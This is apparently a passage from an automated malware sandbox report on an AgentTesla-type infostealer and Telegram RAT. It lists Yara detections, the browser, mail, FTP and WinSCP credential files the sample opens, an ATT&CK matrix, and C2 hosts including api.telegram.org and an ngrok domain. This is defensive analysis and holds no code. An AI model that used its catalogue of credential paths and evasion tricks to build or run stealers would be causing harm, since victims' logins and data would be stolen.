              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected AgentTesla
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: 00000003.00000002.2401382417.0000000007D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4629529277.0000000007B6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.4620180662.0000000006ECB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2401382417.0000000007D17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4629529277.0000000007B64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4629529277.0000000007A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2401382417.0000000007BB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: gq8sce-clean.com.com.exe PID: 4668, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: OgBoRN.exe PID: 6656, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: OgBoRN.exe PID: 5588, type: MEMORYSTR
              Yara detected Discord Token Stealer
              Source: Yara matchFile source: Process Memory Space: OgBoRN.exe PID: 6656, type: MEMORYSTR
              Yara detected Telegram RAT
              Source: Yara matchFile source: 00000003.00000002.2401382417.0000000007D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4629529277.0000000007B6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.4620180662.0000000006ECB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: gq8sce-clean.com.com.exe PID: 4668, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: OgBoRN.exe PID: 6656, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: OgBoRN.exe PID: 5588, type: MEMORYSTR
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: Yara matchFile source: 00000000.00000002.4620180662.0000000006ECB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4629529277.0000000007A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2401382417.0000000007BB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: gq8sce-clean.com.com.exe PID: 4668, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: OgBoRN.exe PID: 6656, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: OgBoRN.exe PID: 5588, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected AgentTesla
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: 00000003.00000002.2401382417.0000000007D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4629529277.0000000007B6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.4620180662.0000000006ECB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2401382417.0000000007D17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4629529277.0000000007B64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4629529277.0000000007A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2401382417.0000000007BB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: gq8sce-clean.com.com.exe PID: 4668, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: OgBoRN.exe PID: 6656, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: OgBoRN.exe PID: 5588, type: MEMORYSTR
              Yara detected Discord Token Stealer
              Source: Yara matchFile source: Process Memory Space: OgBoRN.exe PID: 6656, type: MEMORYSTR
              Yara detected Telegram RAT
              Source: Yara matchFile source: 00000003.00000002.2401382417.0000000007D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4629529277.0000000007B6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.4620180662.0000000006ECB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: gq8sce-clean.com.com.exe PID: 4668, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: OgBoRN.exe PID: 6656, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: OgBoRN.exe PID: 5588, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Disable or Modify Tools              		2
              OS Credential Dumping              		1
              File and Directory Discovery              		Remote Services1
              Archive Collected Data              		1
              Web Service              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		1
              Registry Run Keys / Startup Folder              		2
              Process Injection              		1
              Obfuscated Files or Information              		11
              Input Capture              		34
              System Information Discovery              		Remote Desktop Protocol2
              Data from Local System              		3
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              Registry Run Keys / Startup Folder              		1
              DLL Side-Loading              		1
              Credentials in Registry              		1
              Query Registry              		SMB/Windows Admin Shares1
              Email Collection              		11
              Encrypted Channel              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Masquerading              		NTDS631
              Security Software Discovery              		Distributed Component Object Model11
              Input Capture              		4
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script261
              Virtualization/Sandbox Evasion              		LSA Secrets2
              Process Discovery              		SSH1
              Clipboard Data              		15
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Process Injection              		Cached Domain Credentials261
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Hidden Files and Directories              		DCSync1
              Application Window Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              System Network Configuration Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1619245 Sample: gq8sce-clean.com.com.exe Startdate: 19/02/2025 Architecture: WINDOWS Score: 100 19 api.telegram.org 2->19 21 kvrcmhqc.ngrok.io 2->21 23 2 other IPs or domains 2->23 31 Suricata IDS alerts for network traffic 2->31 33 Found malware configuration 2->33 35 Multi AV Scanner detection for submitted file 2->35 39 5 other signatures 2->39 6 gq8sce-clean.com.com.exe 16 6 2->6         started        11 OgBoRN.exe 14 3 2->11         started        13 OgBoRN.exe 3 2->13         started        signatures3 37 Uses the Telegram API (likely for C&C communication) 19->37 process4 dnsIp5 25 ip-api.com 208.95.112.1, 49705, 49750, 49805 TUT-ASUS United States 6->25 27 api.telegram.org 149.154.167.220, 443, 49707, 49708 TELEGRAMRU United Kingdom 6->27 29 2 other IPs or domains 6->29 15 C:\Users\user\AppData\Roaming\...\OgBoRN.exe, PE32 6->15 dropped 17 C:\Users\user\...\OgBoRN.exe:Zone.Identifier, ASCII 6->17 dropped 41 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 6->41 43 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 6->43 45 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 6->45 59 2 other signatures 6->59 47 Multi AV Scanner detection for dropped file 11->47 49 Tries to steal Mail credentials (via file / registry access) 11->49 51 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->51 53 Tries to harvest and steal ftp login credentials 13->53 55 Tries to harvest and steal browser information (history, passwords, etc) 13->55 57 Installs a global keyboard hook 13->57 file6 signatures7

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.